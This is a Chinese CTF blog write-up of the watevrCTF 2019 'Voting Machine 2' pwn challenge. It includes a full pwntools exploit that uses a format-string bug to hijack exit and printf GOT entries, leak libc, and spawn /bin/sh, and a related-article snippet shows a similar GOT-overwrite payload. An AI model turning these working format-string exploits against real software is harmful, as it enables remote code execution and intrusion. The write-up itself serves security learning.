【PWN · 格式化字符串|劫持GOT表】[watevrCTF 2019]Voting Machine 2]

最新推荐文章于 2024-01-22 20:46:30 发布
最新推荐文章于 2024-01-22 20:46:30 发布
阅读量457 收藏 9
点赞数 11
分类专栏: 格式化字符串漏洞 文章标签: 格式化字符串漏洞 CTF PWN GOT表劫持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/135666480
版权

劫持GOT表:后门 or getshell

目录

前言

思路

EXP

总结

一、前言

和以往不同的是,格式化字符产参数没有对齐,有两个字节的偏移需要自己填充或者交给fmtstr_payload的参数进行构造。

可以通过后门函数获得flag或者getshell获得flag

二、思路

非预期解

可恶!没有看到后门函数呜呜呜

1.将exit(0)劫持到main以便于重复利用

2.%s泄露got表->libc信息

3.劫持printf为system,构造printf('/bin/sh\x00')

预期解:

 

劫持到后门函数即可

三、EXP

from pwn import *
from pwn import p32
from LibcSearcher import *
context(arch='i386',log_level='debug')

io=process('./pwn')
elf=ELF('./pwn')
# gdb.attach(io)
# input()
exit_got=elf.got['exit']
main=0x84207FB

payload=fmtstr_payload(7,{exit_got:main},offset_bytes=2)
io.sendlineafter(b'Topic: ',payload)

printf_got=elf.got['printf']
print(hex(printf_got))
payload=b'aa'+p32(printf_got)+b'cccc'+b'%8$s'+b'cccc'

io.sendlineafter(b'Topic: ',payload)
io.recvuntil(b'cccc')
printf_real=u32(io.recvuntil(b'cccc',drop=True)[:4])

libc=LibcSearcher('printf',printf_real)
libc_base=printf_real-libc.dump('printf')
system=libc_base+libc.dump('system')
payload=fmtstr_payload(7,{printf_got:system},offset_bytes=2)
io.sendlineafter(b'Topic: ',payload)
io.sendline(b'/bin/sh\x00')
io.interactive()

四、总结

存在两个字节的偏移,fmtstr_payload的各个参数含义要好好掌握。

Mr_Fmnwon
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN2PLY:从PWN格式到PLY格式的转换器-matlab开发
05-30
PWN2PLY 是一个 GUI 应用程序,专门用于将 PWN 文件转换为 PLY 格式。 该应用程序应用一种算法来构建一个网格,可记录为 PLY 格式(多边形,更准确地说是三角形),从一组法线和 PWN 文件的应用点(带法线的点)。 所讨论的算法从定义属于要网格的体积的指标函数中提取等值面。 该方法的主要思想是在定义法线场为指示函数梯度(三维向量场、标量场梯度、符号取决于法线方向)。 因此,根据法线三维傅立叶变换的积分计算的空间指示函数被注入到等值面提取方法中以定义对象的面。 相应的 MATLAB 补丁可以以 PLY ASCII 格式保存。 PWN 子文件夹中有几个 PWN 文件可用: -Incomplete_squirrel.pwn - Low_sampling_sphere.pwn - Stanford_bunny.pwn - Stanford_dragon.pwn - 圆环.pwn
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
[pwn]格式化字符串全自动exp!!!
mid2dog
05-14 2054
前言 格式化字符串一把梭真的好爽!!!!!! 再也不用绞尽脑汁去gdb调试多少个字节和几位了!! 呜呜呜,花了一个通宵把这一系列搞定,喜极而泣,特此记录 以前的我做这类题心理状态: 现在的我: 总之就是非!常!爽! 这里我用的例题是 [第五空间2019决赛] 里的pwn5,考察到的知识是单纯的格式化字符串格式化字符串原理及利用 原理就不赘述啦,详情参考ctfwiki上的内容 或者搜索下,其他很多大佬写的文章都超级棒!! 利用的话,如下: 利用格式化字符串漏洞,一般会有如下几种操作: 泄露栈内存
格式化字符串漏洞 | 劫持printf_got】[Google CTF]fmt_pwn
Mr_Fmnwon的博客
10-29 439
浅记录一下格式化字符串劫持printf_got,比较简单,仅记录exp。
watevr_2019_5x5_lightsout
seaaseesa的博客
08-16 516
watevr_2019_5x5_lightsout 根据这里的越界异或,将返回地址改为one_gadget。其中注意到能够异或的值是有限定的,可以异或(7 << (i - 1))的值,如下 00000011 00000111 00001110 00011100 00111000 01110000 11100000 11000000 10000000 00000000 可以发现,这样值已经可以构造任意的值了。如下exp,是假设存在借位的情况,因此需要一定的概率才能成功 #codin
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1711
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
PWN · 格式化字符串|劫持fini_array|劫持got】[CISCN 2019西南]PWN1
Mr_Fmnwon的博客
01-22 1308
如果存在格式化字符串,保护机制开的不健全,通常可以劫持got,构造后门函数。然而,如果不存在循环、栈溢出控制rop等方式,如果格式化字符串漏洞点正常来说只能执行一次,getshell是比较困难的。不过,linux下的二进制程序,在最后退出时,总会执行一些清扫函数,其中涉及到了fini_array这个数据结构。一、fini_array通过利用fini_array部署并启动ROP攻击 | TaQini-CSDN博客简单来说,fini_array数组存放了函数指针,在退出时,会进行调用。
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
通过链接六个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 ... ... 通过Safari使用攻击者服务器的IP访问网站: ...
关于读取popen输出结果时未截断字符串导致的命令行注入详解
12-31
比方说这道pwn题,就是调用system时,没有对输入数据进行\0截断以及对特殊字符处理不当而导致的。 命令行注入相对于其他二进制漏洞相比利用比较简单,比方说这道题,举个例子: sprintf(&s, du -sh lib/'%s', v
项目七.ipynb
05-30
项目七.ipynb
grpcio-1.36.0-cp37-cp37m-manylinux2014_i686.whl
05-30
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
grpcio-1.39.0-cp38-cp38-manylinux2010_x86_64.whl
05-30
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
RunCat-for-windows:在 Windows 任务栏飞奔的“小猫”
05-30
RunCat_for_windows:在 Windows 任务栏飞奔的“小猫”。这是一个用 C# 写的小工具,它会在 Windows 任务栏显示一只奔跑的小猫动画,CPU 使用率越高它跑得越快。 猫奴必备。让桌面跑动起来的可爱猫主题桌面宠物! 项目地址:https://github.com/Kyome22/RunCat_for_windows RunCat 是一个专为Windows用户设计的独特桌面应用,将编程与乐趣完美结合,让你在编码时也能享受到一丝轻松与惬意。这款应用会在你的任务栏上显示一只活泼的小猫,随着你编程的速度奔跑、跳跃,仿佛代码的每一行都在驱动小猫的生命力。
基于SSM/Layui框架实现的学生宿舍管理系统(毕业设计)
最新发布
05-30
【作品名称】:基于SSM/Layui框架实现的学生宿舍管理系统(毕业设计) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: #### 实现功能 - [x] 管理员的登录与登出 - [x] 管理员,班级,学生,宿舍,卫生,访客各模块增删改查 - [x] 个别模块关联查询 - [x] 各个模块数据导出Excel
scratch2源码击败倭寇
05-30
scratch2源码击败倭寇提取方式是百度网盘分享地址
scratch2源码我的世界
05-30
scratch2源码我的世界提取方式是百度网盘分享地址
Labview配置文件的读写
05-30
Labview配置文件的读写
字符串拼接实现pwn
12-03
字符串拼接在pwn中是非常常见的,可以用于构造payload,实现漏洞利用。下面是一个简单的例子,演示了如何使用字符串拼接实现pwn: 假设有一个程序存在格式化字符串漏洞,我们需要构造一个payload来执行system("/bin/sh")。首先,我们需要获取system函数的地址,可以使用pwntools中的DynELF模块来实现: ```python from pwn import * p = process("./vuln") # 启动程序 elf = ELF("./vuln") # 加载程序 # 获取system函数的地址 system_addr = elf.sym["system"] ``` 接下来,我们需要构造payload。由于格式化字符串漏洞是通过将格式化字符串作为参数传递给函数来触发的,因此我们需要构造一个包含system函数地址的格式化字符串。具体来说,我们可以使用"%n$"来引用参数列中的第n个参数,从而实现读取任意地址的数据。例如,"%12$n"示将当前已经输出的字符数写入参数列中的第12个参数所指向的地址中。 ```python # 构造payload payload = p32(elf.got["printf"]) # 将printf的GOT地址作为第一个参数 payload += "%{}x%12$hn".format(system_addr & 0xffff) # 将system地址的低16位写入printf的GOT地址 payload += "%{}x%13$hn".format((system_addr >> 16) & 0xffff - (system_addr & 0xffff)) # 将system地址的高16位写入printf的GOT地址+2 ``` 最后,我们只需要将payload发送给程序即可: ```python # 发送payload p.sendline(payload) p.interactive() # 进入交互模式,可以手动输入命令 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值